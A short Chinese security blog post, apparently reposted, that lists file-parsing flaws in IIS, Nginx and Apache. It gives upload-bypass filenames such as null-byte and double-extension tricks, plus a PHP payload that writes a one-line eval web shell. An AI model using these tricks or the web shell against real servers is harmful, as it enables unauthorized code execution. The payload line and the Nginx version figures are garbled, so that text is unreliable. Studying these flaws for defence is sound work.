文件解析漏洞

0x00 IIS5.x/6.0解析漏洞

1.目录解析(在asp文件后缀的文件可以以asp的格式被解析)

/xx.asp/xx.jpg

2.文件解析(以前可以绕狗和策略)

test.asp;.jpg

0x01 IIS7.0/IIS7.5/Nginx<8.03畸形解析漏洞

Nginx解析漏洞是由我国安全组织80sec发现

在默认Fast-CGI开启状况下,上传一个test.jpg,内容为

<?PHP fputs(fopen('shell.php','w')>,'<?php?eval($_POST[cmd]?>');?>

直接访问test.jpg/.php,则会在这个目录下生成一个一句话木马shell.php

0x02 Nginx<8.03?空字节代码执行漏洞

影响:0.5. 0.6. ?0.7?<=?0.7.65 ?0.8?<=?0.8.37

Nginx在图片中嵌入PHP代码然后通过访问

test,jpg%00.php

0x03 Apache解析漏洞

Apache是从右往左进行解析,如果不能解析,就往前跳,再进行识别解析。

那么可以写 test,php.owf.rar 后面两个后缀名,apache是无法识别的,所以最终跳到前面的php后缀进行解析。

判断是不是合法的后缀,就只能一个个进行尝试看看是否能成功。

0x04 其他

在windows环境,test.jpg[空格]或者test.jpg. 这两类都是不被允许的,windows会自动消除多余的空格或者点绕过黑名单。

以及上一章节的,htaccess文件也可以视作一个解析,不多赘述。

我的志向是星辰大海。
原文地址:https://www.cnblogs.com/xiaqingfeng/p/12084866.html